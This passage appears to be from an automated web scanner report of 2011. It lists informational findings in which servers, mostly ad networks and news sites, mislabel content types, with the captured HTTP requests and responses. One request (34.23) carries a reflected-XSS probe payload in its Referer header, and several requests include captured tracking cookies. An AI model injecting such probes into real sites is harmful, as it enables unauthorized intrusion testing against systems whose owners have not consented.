34.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:28:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1653

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 12:56:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1652

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:27:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1652

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.16. http://ak.c.ooyala.com/d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj/hsDN-m_bJJsXh8PiFhxJgLZO7aYuQRy7 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ak.c.ooyala.com
Path:	/d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj/hsDN-m_bJJsXh8PiFhxJgLZO7aYuQRy7

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj/hsDN-m_bJJsXh8PiFhxJgLZO7aYuQRy7 HTTP/1.1
Host: ak.c.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: EG8XRIBClhILODMzSqFYpTUV1s11FaVjuj/CQ8KG1/v1Shkq13iSIavdE5UMW3Yr
x-amz-request-id: 8815EEFB3E746788
Last-Modified: Fri, 28 Jan 2011 10:49:14 GMT
ETag: "8c0fc563fdfc0c9d7a30eaeb086a342d"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 286
Server: AmazonS3
Cache-Control: max-age=604800
Date: Sun, 30 Jan 2011 12:49:01 GMT
Connection: close

x...;o.0.....[Rrwy`Wv..R..
...bB.IP.A.O_.T.b@]2..=..;K...{.....E].........*7..x..0I..>.........\........O.q.m....}S.......?f3z.B....i9...+........bg.......<..X;........p..p.I.Q...... ...x.&..P5..<.4..
...[SNIP]...

34.17. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://amch.questionmarket.com
Path:	/adsc/d775684/10/38973908/decide.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

34.18. http://amch.questionmarket.com/adscgen/st.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

34.19. http://api.bit.ly/shorten previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.bit.ly
Path:	/shorten

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=utf-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /shorten HTTP/1.1
Host: api.bit.ly
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

34.20. http://ar.voicefive.com/b/rc.pli previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p85001580&1296351015841 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296351006%2E909%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:30:17 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

34.21. http://b.rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://b.rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; Charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVSRQ&AP=1025 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2136
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8010639-T28253488-C93000000000038010
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:27:25 GMT
Content-Length: 2136

//<![CDATA[
function getRADIds() { return{"adid":"93000000000038010","pid":"8010639","targetid":"28253488"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 30);if(paren
...[SNIP]...

34.22. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117809&PluID=0&w=300&h=60&ord=35801428&ifrm=1&ncu=$$http://g.redacted/_2AD0003L/79000000000085282.1?!&&PID=7902678&UIT=G&TargetID=28253485&AN=35801428&PG=INVPC2&ASID=a610568226dd43348f3d9fefa630960e$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=f+JvabEk02WG00002h5iUabNA07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 30 Jan 2011 12:56:45 GMT
Connection: close
Content-Length: 2204

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

34.23. http://cartoonblog.msnbc.redacted/_vine/printer previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cartoonblog.msnbc.redacted
Path:	/_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=cartoonblog&path=/ HTTP/1.1
Host: cartoonblog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

34.24. http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://content.pulse360.com
Path:	/42EBFC62-1F4E-11E0-AB70-41F5E4064C68

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

34.25. http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://content.pulse360.com
Path:	/517F9430-C0FA-11DF-831B-94A93FF5047F

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

34.26. http://context3.kanoodle.com/cgi-bin/context.cgi previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://context3.kanoodle.com
Path:	/cgi-bin/context.cgi

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

34.27. http://engine2.adzerk.net/z/8277/adzerk1_2_4_43,adzerk2_2_17_45 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://engine2.adzerk.net
Path:	/z/8277/adzerk1_2_4_43,adzerk2_2_17_45

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

34.28. http://engine2.adzerk.net/z/8277/adzerk2_2_17_45 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://engine2.adzerk.net
Path:	/z/8277/adzerk2_2_17_45

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

34.29. http://english.aljazeera.net/Media/ver2/Images/1pximage.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://english.aljazeera.net
Path:	/Media/ver2/Images/1pximage.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /Media/ver2/Images/1pximage.png HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Referer: http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 09:47:37 GMT
Cache-Control: public, max-age=86400
Content-Length: 43
Content-Type: image/png
Last-Modified: Sun, 29 Aug 2010 07:37:00 GMT
Accept-Ranges: bytes
ETag: "0f629f74c47cb1:f49"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 18227
X-Cache: HIT from 12.120.11.61
Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

GIF89a.............!.......,...........D..;

34.30. http://english.aljazeera.net/Services/IncludePart/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://english.aljazeera.net
Path:	/Services/IncludePart/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /Services/IncludePart/?T=3&Id=201113085252994161&P=&V=2&AjaxRequestUniqueId=12963989224411 HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Referer: http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=258846558.1296398916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258846558.2101007970.1296398916.1296398916.1296398916.1; __utmc=258846558; __utmb=258846558.1.10.1296398916

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:47:47 GMT
Expires: Sun, 30 Jan 2011 14:53:47 GMT
Date: Sun, 30 Jan 2011 14:51:30 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 35
X-Cache: MISS from 12.120.11.23
Via: 1.1 12.120.11.23:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

34.31. http://english.aljazeera.net/Services/IncludePart/LevelOne/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://english.aljazeera.net
Path:	/Services/IncludePart/LevelOne/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /Services/IncludePart/LevelOne/?T=7&Id=2008521161625794450&P=&V=2&AjaxRequestUniqueId=12963989224410 HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Referer: http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=258846558.1296398916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258846558.2101007970.1296398916.1296398916.1296398916.1; __utmc=258846558; __utmb=258846558.1.10.1296398916

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:47:47 GMT
Expires: Sun, 30 Jan 2011 14:53:47 GMT
Date: Sun, 30 Jan 2011 14:51:30 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 1714
X-Cache: MISS from 12.120.11.61
Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<link href="/Styles/Menu.css" rel="stylesheet" type="text/css" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />

<noscript>
<div class="Height10"></div>
<table c
...[SNIP]...

34.32. http://geo.eyewonder.com/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://geo.eyewonder.com
Path:	/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

34.33. http://i1.silverlight.net/avatar/anonymous.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://i1.silverlight.net
Path:	/avatar/anonymous.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /avatar/anonymous.jpg?forceidenticon=True&dt=634319214000000000&cdn_id=12152010 HTTP/1.1
Host: i1.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 10000
Content-Type: image/png
Last-Modified: Sat, 29 Jan 2011 22:45:16 GMT
ETag: anonymous.True
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20510.895
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Cache-Control: public, max-age=3562
Expires: Sun, 30 Jan 2011 00:14:10 GMT
Date: Sat, 29 Jan 2011 23:14:48 GMT
Connection: close

GIF89a;.;.......... A|)P....*R.Vy.%H....(N...."E.......%J.'L....!B.h..s.....w..#F....+T.,T.`.....<b.....@z...6X.4\....Ad.Gl.......(M..?z"D.......'M.+S.&K.&K.............+T..............?y.........|...
...[SNIP]...

34.34. http://i3.silverlight.net/avatar/anonymous.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://i3.silverlight.net
Path:	/avatar/anonymous.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /avatar/anonymous.jpg?forceidenticon=True&dt=634319217000000000&cdn_id=12152010 HTTP/1.1
Host: i3.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Length: 10000
Content-Type: image/png
Last-Modified: Sat, 29 Jan 2011 22:45:16 GMT
ETag: anonymous.True
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20510.895
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Cache-Control: public, max-age=3580
Expires: Sun, 30 Jan 2011 00:15:02 GMT
Date: Sat, 29 Jan 2011 23:15:22 GMT
Connection: close

GIF89a;.;.......... A|)P....*R.Vy.%H....(N...."E.......%J.'L....!B.h..s.....w..#F....+T.,T.`.....<b.....@z...6X.4\....Ad.Gl.......(M..?z"D.......'M.+S.&K.&K.............+T..............?y.........|...
...[SNIP]...

34.35. http://info.ooyala.com/info/secondary/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://info.ooyala.com
Path:	/info/secondary/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /info/secondary/ HTTP/1.1
Host: info.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sun, 30 Jan 2011 15:59:00 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store
Content-Length: 364

